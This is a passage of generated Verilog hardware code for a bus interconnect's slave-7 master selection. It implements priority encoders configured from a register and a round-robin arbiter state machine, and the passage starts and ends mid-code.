            if ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[7] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[6] ) ) } == 2'h0 ) 
            begin
                s7_msel_pri_enc_pd3_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[7] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[6] ) ) } == 2'h1 ) 
                begin
                    s7_msel_pri_enc_pd3_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[7] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[6] ) ) } == 2'h2 ) 
                    begin
                        s7_msel_pri_enc_pd3_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s7_msel_pri_enc_pd3_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s7_msel_pri_enc_valid[3] or  { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[7] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[6] ) ) })
    begin
        if (  !( s7_msel_pri_enc_valid[3]) ) 
        begin
            s7_msel_pri_enc_pd3_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[7] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[6] ) ) } == 2'h0 ) 
            begin
                s7_msel_pri_enc_pd3_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s7_msel_pri_enc_pd3_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s7_msel_pri_enc_valid[4] or  { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[9] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[8] ) ) })
    begin
        if (  !( s7_msel_pri_enc_valid[4]) ) 
        begin
            s7_msel_pri_enc_pd4_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[9] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[8] ) ) } == 2'h0 ) 
            begin
                s7_msel_pri_enc_pd4_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[9] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[8] ) ) } == 2'h1 ) 
                begin
                    s7_msel_pri_enc_pd4_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[9] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[8] ) ) } == 2'h2 ) 
                    begin
                        s7_msel_pri_enc_pd4_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s7_msel_pri_enc_pd4_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s7_msel_pri_enc_valid[4] or  { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[9] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[8] ) ) })
    begin
        if (  !( s7_msel_pri_enc_valid[4]) ) 
        begin
            s7_msel_pri_enc_pd4_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[9] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[8] ) ) } == 2'h0 ) 
            begin
                s7_msel_pri_enc_pd4_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s7_msel_pri_enc_pd4_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s7_msel_pri_enc_valid[5] or  { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[11] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[10] ) ) })
    begin
        if (  !( s7_msel_pri_enc_valid[5]) ) 
        begin
            s7_msel_pri_enc_pd5_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[11] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[10] ) ) } == 2'h0 ) 
            begin
                s7_msel_pri_enc_pd5_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[11] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[10] ) ) } == 2'h1 ) 
                begin
                    s7_msel_pri_enc_pd5_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[11] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[10] ) ) } == 2'h2 ) 
                    begin
                        s7_msel_pri_enc_pd5_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s7_msel_pri_enc_pd5_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s7_msel_pri_enc_valid[5] or  { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[11] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[10] ) ) })
    begin
        if (  !( s7_msel_pri_enc_valid[5]) ) 
        begin
            s7_msel_pri_enc_pd5_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[11] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[10] ) ) } == 2'h0 ) 
            begin
                s7_msel_pri_enc_pd5_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s7_msel_pri_enc_pd5_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s7_msel_pri_enc_valid[6] or  { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[13] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[12] ) ) })
    begin
        if (  !( s7_msel_pri_enc_valid[6]) ) 
        begin
            s7_msel_pri_enc_pd6_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[13] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[12] ) ) } == 2'h0 ) 
            begin
                s7_msel_pri_enc_pd6_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[13] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[12] ) ) } == 2'h1 ) 
                begin
                    s7_msel_pri_enc_pd6_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[13] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[12] ) ) } == 2'h2 ) 
                    begin
                        s7_msel_pri_enc_pd6_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s7_msel_pri_enc_pd6_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s7_msel_pri_enc_valid[6] or  { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[13] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[12] ) ) })
    begin
        if (  !( s7_msel_pri_enc_valid[6]) ) 
        begin
            s7_msel_pri_enc_pd6_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[13] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[12] ) ) } == 2'h0 ) 
            begin
                s7_msel_pri_enc_pd6_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s7_msel_pri_enc_pd6_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s7_msel_pri_enc_valid[7] or  { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[15] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[14] ) ) })
    begin
        if (  !( s7_msel_pri_enc_valid[7]) ) 
        begin
            s7_msel_pri_enc_pd7_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[15] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[14] ) ) } == 2'h0 ) 
            begin
                s7_msel_pri_enc_pd7_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[15] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[14] ) ) } == 2'h1 ) 
                begin
                    s7_msel_pri_enc_pd7_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[15] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[14] ) ) } == 2'h2 ) 
                    begin
                        s7_msel_pri_enc_pd7_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s7_msel_pri_enc_pd7_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s7_msel_pri_enc_valid[7] or  { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[15] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[14] ) ) })
    begin
        if (  !( s7_msel_pri_enc_valid[7]) ) 
        begin
            s7_msel_pri_enc_pd7_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[15] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[14] ) ) } == 2'h0 ) 
            begin
                s7_msel_pri_enc_pd7_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s7_msel_pri_enc_pd7_pri_out_d0 = 4'b0010;
            end
        end
    end
    assign s7_msel_pri_enc_pri_out_tmp = ( ( ( ( ( ( ( ( ( ( s7_msel_pri_enc_pd0_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s7_msel_pri_enc_pd0_pri_sel == 1'd1 ) ) ? ( s7_msel_pri_enc_pd0_pri_out_d0 ) : ( s7_msel_pri_enc_pd0_pri_out_d1 ) ) ) ) | ( ( ( s7_msel_pri_enc_pd1_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s7_msel_pri_enc_pd1_pri_sel == 1'd1 ) ) ? ( s7_msel_pri_enc_pd1_pri_out_d0 ) : ( s7_msel_pri_enc_pd1_pri_out_d1 ) ) ) ) ) | ( ( ( s7_msel_pri_enc_pd2_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s7_msel_pri_enc_pd2_pri_sel == 1'd1 ) ) ? ( s7_msel_pri_enc_pd2_pri_out_d0 ) : ( s7_msel_pri_enc_pd2_pri_out_d1 ) ) ) ) ) | ( ( ( s7_msel_pri_enc_pd3_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s7_msel_pri_enc_pd3_pri_sel == 1'd1 ) ) ? ( s7_msel_pri_enc_pd3_pri_out_d0 ) : ( s7_msel_pri_enc_pd3_pri_out_d1 ) ) ) ) ) | ( ( ( s7_msel_pri_enc_pd4_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s7_msel_pri_enc_pd4_pri_sel == 1'd1 ) ) ? ( s7_msel_pri_enc_pd4_pri_out_d0 ) : ( s7_msel_pri_enc_pd4_pri_out_d1 ) ) ) ) ) | ( ( ( s7_msel_pri_enc_pd5_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s7_msel_pri_enc_pd5_pri_sel == 1'd1 ) ) ? ( s7_msel_pri_enc_pd5_pri_out_d0 ) : ( s7_msel_pri_enc_pd5_pri_out_d1 ) ) ) ) ) | ( ( ( s7_msel_pri_enc_pd6_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s7_msel_pri_enc_pd6_pri_sel == 1'd1 ) ) ? ( s7_msel_pri_enc_pd6_pri_out_d0 ) : ( s7_msel_pri_enc_pd6_pri_out_d1 ) ) ) ) ) | ( ( ( s7_msel_pri_enc_pd7_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s7_msel_pri_enc_pd7_pri_sel == 1'd1 ) ) ? ( s7_msel_pri_enc_pd7_pri_out_d0 ) : ( s7_msel_pri_enc_pd7_pri_out_d1 ) ) ) ) );
    always @ (  ( ( ( ( ( ( ( ( ( ( s7_msel_pri_enc_pd0_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s7_msel_pri_enc_pd0_pri_sel == 1'd1 ) ) ? ( s7_msel_pri_enc_pd0_pri_out_d0 ) : ( s7_msel_pri_enc_pd0_pri_out_d1 ) ) ) ) | ( ( ( s7_msel_pri_enc_pd1_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s7_msel_pri_enc_pd1_pri_sel == 1'd1 ) ) ? ( s7_msel_pri_enc_pd1_pri_out_d0 ) : ( s7_msel_pri_enc_pd1_pri_out_d1 ) ) ) ) ) | ( ( ( s7_msel_pri_enc_pd2_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s7_msel_pri_enc_pd2_pri_sel == 1'd1 ) ) ? ( s7_msel_pri_enc_pd2_pri_out_d0 ) : ( s7_msel_pri_enc_pd2_pri_out_d1 ) ) ) ) ) | ( ( ( s7_msel_pri_enc_pd3_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s7_msel_pri_enc_pd3_pri_sel == 1'd1 ) ) ? ( s7_msel_pri_enc_pd3_pri_out_d0 ) : ( s7_msel_pri_enc_pd3_pri_out_d1 ) ) ) ) ) | ( ( ( s7_msel_pri_enc_pd4_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s7_msel_pri_enc_pd4_pri_sel == 1'd1 ) ) ? ( s7_msel_pri_enc_pd4_pri_out_d0 ) : ( s7_msel_pri_enc_pd4_pri_out_d1 ) ) ) ) ) | ( ( ( s7_msel_pri_enc_pd5_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s7_msel_pri_enc_pd5_pri_sel == 1'd1 ) ) ? ( s7_msel_pri_enc_pd5_pri_out_d0 ) : ( s7_msel_pri_enc_pd5_pri_out_d1 ) ) ) ) ) | ( ( ( s7_msel_pri_enc_pd6_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s7_msel_pri_enc_pd6_pri_sel == 1'd1 ) ) ? ( s7_msel_pri_enc_pd6_pri_out_d0 ) : ( s7_msel_pri_enc_pd6_pri_out_d1 ) ) ) ) ) | ( ( ( s7_msel_pri_enc_pd7_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s7_msel_pri_enc_pd7_pri_sel == 1'd1 ) ) ? ( s7_msel_pri_enc_pd7_pri_out_d0 ) : ( s7_msel_pri_enc_pd7_pri_out_d1 ) ) ) ) ))
    begin
        if ( s7_msel_pri_enc_pri_out_tmp[3] ) 
        begin
            s7_msel_pri_enc_pri_out1 = 2'h3;
        end
        else
        begin 
            if ( s7_msel_pri_enc_pri_out_tmp[2] ) 
            begin
                s7_msel_pri_enc_pri_out1 = 2'h2;
            end
            else
            begin 
                if ( s7_msel_pri_enc_pri_out_tmp[1] ) 
                begin
                    s7_msel_pri_enc_pri_out1 = 2'h1;
                end
                else
                begin 
                    s7_msel_pri_enc_pri_out1 = 2'h0;
                end
            end
        end
    end
    always @ (  ( ( ( ( ( ( ( ( ( ( s7_msel_pri_enc_pd0_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s7_msel_pri_enc_pd0_pri_sel == 1'd1 ) ) ? ( s7_msel_pri_enc_pd0_pri_out_d0 ) : ( s7_msel_pri_enc_pd0_pri_out_d1 ) ) ) ) | ( ( ( s7_msel_pri_enc_pd1_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s7_msel_pri_enc_pd1_pri_sel == 1'd1 ) ) ? ( s7_msel_pri_enc_pd1_pri_out_d0 ) : ( s7_msel_pri_enc_pd1_pri_out_d1 ) ) ) ) ) | ( ( ( s7_msel_pri_enc_pd2_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s7_msel_pri_enc_pd2_pri_sel == 1'd1 ) ) ? ( s7_msel_pri_enc_pd2_pri_out_d0 ) : ( s7_msel_pri_enc_pd2_pri_out_d1 ) ) ) ) ) | ( ( ( s7_msel_pri_enc_pd3_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s7_msel_pri_enc_pd3_pri_sel == 1'd1 ) ) ? ( s7_msel_pri_enc_pd3_pri_out_d0 ) : ( s7_msel_pri_enc_pd3_pri_out_d1 ) ) ) ) ) | ( ( ( s7_msel_pri_enc_pd4_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s7_msel_pri_enc_pd4_pri_sel == 1'd1 ) ) ? ( s7_msel_pri_enc_pd4_pri_out_d0 ) : ( s7_msel_pri_enc_pd4_pri_out_d1 ) ) ) ) ) | ( ( ( s7_msel_pri_enc_pd5_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s7_msel_pri_enc_pd5_pri_sel == 1'd1 ) ) ? ( s7_msel_pri_enc_pd5_pri_out_d0 ) : ( s7_msel_pri_enc_pd5_pri_out_d1 ) ) ) ) ) | ( ( ( s7_msel_pri_enc_pd6_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s7_msel_pri_enc_pd6_pri_sel == 1'd1 ) ) ? ( s7_msel_pri_enc_pd6_pri_out_d0 ) : ( s7_msel_pri_enc_pd6_pri_out_d1 ) ) ) ) ) | ( ( ( s7_msel_pri_enc_pd7_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s7_msel_pri_enc_pd7_pri_sel == 1'd1 ) ) ? ( s7_msel_pri_enc_pd7_pri_out_d0 ) : ( s7_msel_pri_enc_pd7_pri_out_d1 ) ) ) ) ))
    begin
        if ( s7_msel_pri_enc_pri_out_tmp[1] ) 
        begin
            s7_msel_pri_enc_pri_out0 = 2'h1;
        end
        else
        begin 
            s7_msel_pri_enc_pri_out0 = 2'h0;
        end
    end
    always @ (  posedge clk_i)
    begin
        if ( rst_i ) 
        begin
            s7_msel_pri_out <= 2'h0;
        end
        else
        begin 
            if ( s7_next ) 
            begin
                s7_msel_pri_out <= ( ( ( s7_msel_pri_enc_pri_sel == 2'd0 ) ) ? ( 2'h0 ) : ( ( ( ( s7_msel_pri_enc_pri_sel == 2'd1 ) ) ? ( s7_msel_pri_enc_pri_out0 ) : ( s7_msel_pri_enc_pri_out1 ) ) ) );
            end
        end
    end
    assign s7_msel_arb0_req = { ( s7_msel_req[7] & ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[15] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[14] ) ) } == 2'd0 ) ), ( s7_msel_req[6] & ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[13] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[12] ) ) } == 2'd0 ) ), ( s7_msel_req[5] & ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[11] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[10] ) ) } == 2'd0 ) ), ( s7_msel_req[4] & ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[9] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[8] ) ) } == 2'd0 ) ), ( s7_msel_req[3] & ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[7] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[6] ) ) } == 2'd0 ) ), ( s7_msel_req[2] & ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[5] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[4] ) ) } == 2'd0 ) ), ( s7_msel_req[1] & ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[3] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[2] ) ) } == 2'd0 ) ), ( s7_msel_req[0] & ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[1] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[0] ) ) } == 2'd0 ) ) };
    assign s7_msel_arb0_gnt = s7_msel_arb0_state;
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s7_msel_arb0_state <= s7_msel_arb0_grant0;
        end
        else
        begin 
            s7_msel_arb0_state <= s7_msel_arb0_next_state;
        end
    end
    always @ (  s7_msel_arb0_state or  { ( s7_msel_req[7] & ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[15] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[14] ) ) } == 2'd0 ) ), ( s7_msel_req[6] & ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[13] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[12] ) ) } == 2'd0 ) ), ( s7_msel_req[5] & ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[11] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[10] ) ) } == 2'd0 ) ), ( s7_msel_req[4] & ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[9] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[8] ) ) } == 2'd0 ) ), ( s7_msel_req[3] & ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[7] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[6] ) ) } == 2'd0 ) ), ( s7_msel_req[2] & ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[5] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[4] ) ) } == 2'd0 ) ), ( s7_msel_req[1] & ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[3] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[2] ) ) } == 2'd0 ) ), ( s7_msel_req[0] & ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[1] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[0] ) ) } == 2'd0 ) ) } or  1'b0)
    begin
        s7_msel_arb0_next_state = s7_msel_arb0_state;
        case ( s7_msel_arb0_state ) 
        s7_msel_arb0_grant0:
        begin
            if (  !( s7_msel_arb0_req[0]) | 1'b0 ) 
            begin
                if ( s7_msel_arb0_req[1] ) 
                begin
                    s7_msel_arb0_next_state = s7_msel_arb0_grant1;
                end
                else
                begin 
                    if ( s7_msel_arb0_req[2] ) 
                    begin
                        s7_msel_arb0_next_state = s7_msel_arb0_grant2;
                    end
                    else
                    begin 
                        if ( s7_msel_arb0_req[3] ) 
                        begin
                            s7_msel_arb0_next_state = s7_msel_arb0_grant3;
                        end
                        else
                        begin 
                            if ( s7_msel_arb0_req[4] ) 
                            begin
                                s7_msel_arb0_next_state = s7_msel_arb0_grant4;
                            end
                            else
                            begin 
                                if ( s7_msel_arb0_req[5] ) 
                                begin
                                    s7_msel_arb0_next_state = s7_msel_arb0_grant5;
                                end
                                else
                                begin 
                                    if ( s7_msel_arb0_req[6] ) 
                                    begin
                                        s7_msel_arb0_next_state = s7_msel_arb0_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s7_msel_arb0_req[7] ) 
                                        begin
                                            s7_msel_arb0_next_state = s7_msel_arb0_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s7_msel_arb0_grant1:
        begin
            if (  !( s7_msel_arb0_req[1]) | 1'b0 ) 
            begin
                if ( s7_msel_arb0_req[2] ) 
                begin
                    s7_msel_arb0_next_state = s7_msel_arb0_grant2;
                end
                else
                begin 
                    if ( s7_msel_arb0_req[3] ) 
                    begin
                        s7_msel_arb0_next_state = s7_msel_arb0_grant3;
                    end
                    else
                    begin 
                        if ( s7_msel_arb0_req[4] ) 
                        begin
                            s7_msel_arb0_next_state = s7_msel_arb0_grant4;
                        end
                        else
                        begin 
                            if ( s7_msel_arb0_req[5] ) 
                            begin
                                s7_msel_arb0_next_state = s7_msel_arb0_grant5;
                            end
                            else
                            begin 
                                if ( s7_msel_arb0_req[6] ) 
                                begin
                                    s7_msel_arb0_next_state = s7_msel_arb0_grant6;
                                end
                                else
                                begin 
                                    if ( s7_msel_arb0_req[7] ) 
                                    begin
                                        s7_msel_arb0_next_state = s7_msel_arb0_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s7_msel_arb0_req[0] ) 
                                        begin
                                            s7_msel_arb0_next_state = s7_msel_arb0_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s7_msel_arb0_grant2:
        begin
            if (  !( s7_msel_arb0_req[2]) | 1'b0 ) 
            begin
                if ( s7_msel_arb0_req[3] ) 
                begin
                    s7_msel_arb0_next_state = s7_msel_arb0_grant3;
                end
                else
                begin 
                    if ( s7_msel_arb0_req[4] ) 
                    begin
                        s7_msel_arb0_next_state = s7_msel_arb0_grant4;
                    end
                    else
                    begin 
                        if ( s7_msel_arb0_req[5] ) 
                        begin
                            s7_msel_arb0_next_state = s7_msel_arb0_grant5;
                        end
                        else
                        begin 
                            if ( s7_msel_arb0_req[6] ) 
                            begin
                                s7_msel_arb0_next_state = s7_msel_arb0_grant6;
                            end
                            else
                            begin 
                                if ( s7_msel_arb0_req[7] ) 
                                begin
                                    s7_msel_arb0_next_state = s7_msel_arb0_grant7;
                                end
                                else
                                begin 
                                    if ( s7_msel_arb0_req[0] ) 
                                    begin
                                        s7_msel_arb0_next_state = s7_msel_arb0_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s7_msel_arb0_req[1] ) 
                                        begin
                                            s7_msel_arb0_next_state = s7_msel_arb0_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s7_msel_arb0_grant3:
        begin
            if (  !( s7_msel_arb0_req[3]) | 1'b0 ) 
            begin
                if ( s7_msel_arb0_req[4] ) 
                begin
                    s7_msel_arb0_next_state = s7_msel_arb0_grant4;
                end
                else
                begin 
                    if ( s7_msel_arb0_req[5] ) 
                    begin
